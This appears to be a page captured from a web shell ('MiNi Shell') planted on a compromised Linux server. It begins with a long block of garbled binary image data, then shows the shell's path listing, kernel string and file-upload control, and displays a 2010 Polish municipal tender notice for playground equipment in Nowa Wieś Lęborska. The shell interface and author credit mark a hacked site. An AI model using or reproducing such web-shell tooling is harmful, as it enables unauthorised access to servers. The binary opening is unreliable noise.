JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100610/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100610/149085-N-2010.html

<p class="kh_header"><b>Nowa Wieś Lęborska: Dostawa wraz z montażem wyposażenia placów zabaw w 19 miejscowościach Gminy Nowa Wieś Lęborska</b><br>
<b>Numer ogłoszenia: 149085 - 2010; data zamieszczenia: 10.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Nowa Wieś Lęborska , ul. Grunwaldzka 24, 84-351 Nowa Wieś Lęborska, woj. pomorskie, tel. 059  8612428 w. 34, faks 059 8612164.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nwl.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> http://bip.nwl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wraz z montażem wyposażenia placów zabaw w 19 miejscowościach Gminy Nowa Wieś Lęborska.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa wraz z montażem wyposażenia dla 21 terenów rekreacyjno - sportowych w urządzenia placów zabaw. Inwestycja zlokalizowana będzie w 19 miejscowościach zgodnie z załącznikiem nr 9 do SIWZ
1.	Nowa Wieś Lęborska - dz. nr 792/11, obręb Nowa Wieś Lęborska
2.	Nowa Wieś Lęborska - dz. nr 774, obręb Nowa Wieś Lęborska
3.	Mosty - dz. nr 25/22 - obręb Lubowidz
4.	Mosty - dz. nr 505/1, obręb Lubowidz
5.	Pogorzelice - dz. nr 201/2 , obręb Pogorzelice
6.	Pogorszewo - dz. nr 6/22, obręb Pogorszewo
7.	Małoszyce - dz. nr 13/21, obręb Małoszyce
8.        Łebien - dz. nr 214/4, obręb Łebien
9.	Garczegorze - dz. 89/7, obręb Garczegorze
10.	Leśnice - dz. nr 234/1, obręb Leśnice
11.	Lubowidz - dz. nr 356/1, obręb Lubowidz
12.	Janowiczki - dz. nr 157, obręb Janowiczki
13.	Czarnówko - dz. nr 69/4, obręb Nowa Wieś Lęborska
14.	Chocielewko - dz. nr 256/3 obręb Chocielewko
15.	Kębłowo Nowowiejskie - dz. nr 67/8, obręb Kębłowo
16.	Janowice - dz. nr 53/18 obręb Janowice
17.	Darżewo - dz. nr 229/24 obręb Darżewo
18.	Bąsewice - dz. nr 302/27 obręb Tawęcino
19.	Obliwice - dz. nr 23/4, obręb Obliwice
20.	Rekowo - dz. nr 52, obręb Rekowo
21.	Krępa Kaszubska - dz. nr 420, obręb Krępa Kaszubska

Zamawiający zastrzega, że pokazane w załączniku nr 8 do SIWZ ilustracje i określone nazwy mają charakter poglądowy i obrazują elementy placów zabaw, jakie spodziewa się uzyskać Zamawiający. W przypadku, gdy w opisie zamówienia lub innej części SIWZ, zostały wskazane znaki towarowe, patenty oraz pochodzenie urządzeń i materiałów należy je traktować, jako propozycje Zamawiającego.
Zamawiający dopuszcza zastosowanie równoważnych materiałów i urządzeń w stosunku do zaprojektowanych z zachowaniem tych samych lub lepszych standardów technicznych, technologicznych i jakościowych. Ponadto zamienne urządzenia przyjęte do wyceny nie mogą wpływać na zmianę rodzaju i zakresu dostaw.
a. Warunki techniczne ogólne:
1)	Zamawiający wymaga aby wszystkie urządzenia zabawowe posiadały certyfikat wydany przez akredytowane jednostki potwierdzające, że urządzenia są zgodne z normami PN - EN 1177 i PN - EN 1176. 
2)	Materiały, substancje, śruby, łańcuchy, sprężyny i inne połączenia oraz elementy zabezpieczające wykorzystane przy produkcji i montażu urządzeń mają posiadać wymagane atesty i dopuszczenia,
3) Elementy konstrukcyjne - belki pionowe i poziome mają być wykonane np. z  drewna sosnowego, musza być okrągłe, lite lub klejone warstwowo, impregnowane próżniowo - ciśnieniowo, główne elementy konstrukcyjne o średnicy min. 12 cm,
4) Elementy metalowe mają być malowane proszkowo, farbami zapewniającymi odporność
na warunki atmosferyczne,
5) Zjeżdżalnie mają mieć około 3 m długości, grubość blachy około 2 mm, z blachy nierdzewnej, kwasoodpornej,
6) Elementy należy mocować na fundamencie umieszczonym minimum 40cm pod powierzchnią gruntu,
7) Wszystkie stosowane śruby winny być ocynkowane,
8) Elementy wykonane ze sklejki winny być pomalowane na rożne kolory w tym na czerwony, żółty, zielony, niebieski aby zwiększyć atrakcyjność zestawów.
9) Zamawiający wymaga aby montaż urządzeń placów zabaw był wykonany w technologii tradycyjnej. Materiały, z których będą wykonane urządzenia były wykonane z tworzyw naturalnych - drewna. Tylko niektóre elementy wykonane mogą być z tworzyw sztucznych (siedziska, ślizgawki). Elementy te muszą charakteryzować się posiadaniem atestów bezpieczeństwa oraz atestów które wymagane są dla infrastruktury publicznej.
10) Wszystkie zastosowane materiały muszą być zgodne z obowiązującymi normami i prawem. Ich użytkowanie nie może stanowić zagrożenia dla zdrowia użytkujących ludzi. 
11) Prowadzone roboty montażowe muszą zostać przeprowadzone zgodnie z normami i instrukcjami montażu producentów i Wykonawców.
12) Zastosowane rozwiązania i materiały muszą być sprawdzone, powszechnie stosowane i wysokiej jakości użytkowej, a ich eksploatacja nie wywiera negatywnego wpływu na bezpieczeństwo i zdrowie ludzi. 
13) Wykonawca w okresie gwarancji musi zapewnić coroczne przeglądy stanu urządzeń na placu zabaw i dokonać konserwacji, zgodnie ze sztuką, potwierdzoną protokołem odbioru robót konserwacyjnych zgodnie z listą kluczowych kryteriów kontroli zawartej w załączniku nr 8
14) Maksymalnie co 3 miesiące Wykonawca jest zobowiązany do przeprowadzenia kontroli funkcjonalnej w czasie której drobiazgowo sprawdza urządzenia, w szczególności pod kątem zużycia sprzętu. 
15) Urządzenia musza być tak zamontowane, aby zapewniały utrzymanie stref bezpieczeństwa, 
16) Płyty użyte w elementach placu zabaw powinny nie ulegać gięciu, puchnięciu, muszą być odporne na chemikalia, wpływy atmosferyczne, malowane lakierami wodnymi,
17) Elementy metalowe muszą być wykonane ze stali, malowane proszkowo,
18) Łożyska huśtawek muszą być samosmarujące, zabezpieczone smarem, 
19) Łańcuchy huśtawek mają być wykonane ze stali kwasoodpornej lub ocynkowanej ogniowo, 
20) Śruby mocujące mają być ocynkowane lub nierdzewne, 
21) Miejsca łączenia musza być zabezpieczone zaślepkami, 
22) Podczas montażu Wykonawca musi unikać szkodliwych działań dla środowiska, a przede wszystkim emitowania nadmiernego hałasu, 
23) Wymagany okres gwarancji 36 m-cy  liczony od daty protokolarnego końcowego odbioru przedmiotu zamówienia.

b. Każdy z 21 placów zabaw musi zostać wyposażony w następujące urządzenia o wymiarach minimum:
1. Zestaw zabawowy (1szt.) o wymiarach min. 5,6m x 6,0m, wysokość 3,3m. Wymiar wraz ze strefą bezpieczeństwa min. 9,7m x 9,0m. W skład którego wchodzi:
- wieża z dachem dwuspadowym
- wieża kwadratowa bez dachu
- ślizg z blach nierdzewnej 3m
- ścianka gimnastyczna w kształcie kratki
- drabinka dwuspadowa
- trap
Wykonany z drewna sosnowego, okrągłego, litego lub klejonego warstwowo o średnicy od 12 cm - 8cm oraz desek drewnianych (podesty)- impregnowany próżniowo - ciśnieniowo środkami grzybobójczymi.
Boki wieży wykonane ze sklejki wodoodpornej, malowane lakierami wodnymi.
Łączniki metalowe malowane proszkowo. Ślizg metalowy wyłożony blachą nierdzewną.
2. Huśtawka podwójna - 1szt. o wymiarach min. 2,5m x 3,0m wysokość 2,2m; Wymiar wraz ze strefą bezpieczeństwa min. 5m x 7,5m. Siedziska powlekane gumą.
3. Huśtawka pojedyncza o wymiarach min. 2,5m x 2,5m, wys. 2,2m. Wymiar wraz ze strefą bezpieczeństwa min. 7,5m x 5,0m. Siedzisko dla małych dzieci gumowe - 1szt.
4. Huśtawka wagowa ważka wymiary min. 3,5m x 0,45m, wys. 0,65m; Wymiar wraz ze strefą bezpieczeństwa min. 5,5 x  2,5m - 1szt. 
5. Ścianka do wspinaczki pojedyncza o wymiarach min. 1,3m x 1,5m wysokość 2,6m; Wymiar wraz ze strefą bezpieczeństwa min. 4,5m x 4,5m - 1szt., Wykonana ze sklejki wodoodpornej, obudowana palisada drewnianą.
6. Karuzela tarczowa z ławeczkami i stoliczkiem min. fi 150 wykonana z rur stalowych malowanych proszkowo, wyłożona blachą aluminiową ryflowaną, stolik z blach nierdzewnej, ławeczki wyłożone sklejką wodoodporną. Wymiar wraz ze strefą bezpieczeństwa min. 2,7m- 1szt.
7. Bujak sprężynowy motyw zwierzęcy - w dwóch różnych wzorach - wykonany ze sklejki wodoodpornej- 2szt., Wymiar wraz ze strefą bezpieczeństwa min. 3,5m.
8. Piaskownica z bali - 1szt. o wymiarach min. 3m x 3m wysokość 0,3m wykonana z bali o średnicy min. 10cm z siedziskami w narożnikach wraz z przykryciem o wymiarach odpowiadających wymiarom piaskownicy, wypełniona piaskiem drobnoziarnistym, jasnym.
9. Ławka na stelażu metalowym - poszycie drewniane - 3szt. minimum 3 osobowa o wymiarach minimalnych: wysokość 85cm, głębokość 45cm, długość 180cm.
Ponadto każdy plac zabaw musi być wyposażony w kosz na śmieci metalowy o pojemności min. 40l, malowany proszkowo, stacjonarny kotwiony w gruncie - 2szt. i tablicę regulaminową wolnostojącą umieszczoną na dwóch słupach o wym. min. 0,5m x 0,75m wysokość 2,15m - 1szt. Treść zawarta na tablicy informacyjnej musi przed montażem zostać przedstawiona Zamawiającemu do akceptacji.

Zamawiający dopuszcza różnice w rozmiarach urządzeń w odchyleniu +/- 5 %
Zaleca się wykonawcom przeprowadzenie szczegółowej wizji lokalnej w miejscu realizacji zamówienia celem uzyskania wszystkich koniecznych informacji do przygotowania oferty i zawarcia umowy. Każdy z wykonawców ponosi pełną odpowiedzialność za skutki braku lub mylnego rozpoznania warunków realizacji zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium przed upływem terminu składania ofert w wysokości: 4.000,00zł
2.	Wadium może być wniesione w: pieniądzu na rachunek depozytowy Gminy:	Bank Spółdzielczy w Łebie 35 9324 0008 0002 7209 2000 0060 z podaniem tytułu wpłaty, w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 z późniejszymi zmianami).
3.	Wykonawca zobowiązany jest wnieść wadium przed złożeniem oferty i dowód wniesienia wadium załączyć do oferty w formie oryginału lub kserokopii potwierdzonej za zgodność z oryginałem. 
4.	Za moment wniesienia wadium w pieniądzu przyjmuje się wpływ środków na konto Zamawiającego.  
5.	Warunki wniesienia i zwrotu wadium zgodnie z art. 45 i 46 ustawy Prawo Zamówień Publicznych.
6.	Jeżeli zostanie przedłużony terminu związania ofertą to zostanie przedłużony okresu ważności wadium albo, jeżeli nie jest to możliwe, zostanie wniesione nowe wadium na przedłużony okres związania ofertą. Jeżeli przedłużenie terminu związania ofertą dokonywane jest po wyborze oferty najkorzystniejszej, obowiązek wniesienia nowego wadium lub jego przedłużenia dotyczy jedynie wykonawcy, którego oferta została wybrana jako najkorzystniejsza.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest posiadanie przez Wykonawcę niezbędnego doświadczenia w zakresie wykonania  co najmniej 1 dostawy zgodnym z przedmiotem zamówienia o wartości co najmniej 250.000 złotych brutto w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie.
Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu będzie odbywać się na podstawie załączonych do oferty dokumentów lub oświadczeń. Podczas oceny Zamawiający będzie kierował się regułą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczególnych wymogów w tym zakresie. Wystarczającym jest złożenie oświadczenia o spełnieniu warunków określone w art. 22 ust. 1 Pzp. Oceny spełnienia w/w warunków Zamawiający dokona sprawdzając kompletność oferty oraz poprawność i treść złożonych dokumentów wymienionych w rozdziale XI SIWZ metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Zamawiający nie określił szczególnych wymogów w tym zakresie. Wystarczającym jest złożenie oświadczenia o spełnieniu warunków określone w art. 22 ust. 1 Pzp. Oceny spełnienia w/w warunków Zamawiający dokona sprawdzając kompletność oferty oraz poprawność i treść złożonych dokumentów wymienionych w rozdziale XI SIWZ metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest, aby Wykonawca był ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 100 000,00 zł.
Oceny spełnienia w/w warunków Zamawiający dokona sprawdzając kompletność oferty oraz poprawność i treść złożonych dokumentów wymienionych w rozdziale XI SIWZ metodą spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.nwl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Nowej Wsi Lęborskiej, ul. Grunwaldzka 24, 84 - 351 Nowa Wieś Lęborska, pokój nr 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2010 godzina 10:00, miejsce: Urząd Gminy w Nowej Wsi Lęborskiej, ul. Grunwaldzka 24, 84 - 351 Nowa Wieś Lęborska, Kancelaria, pokój nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007 - 2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com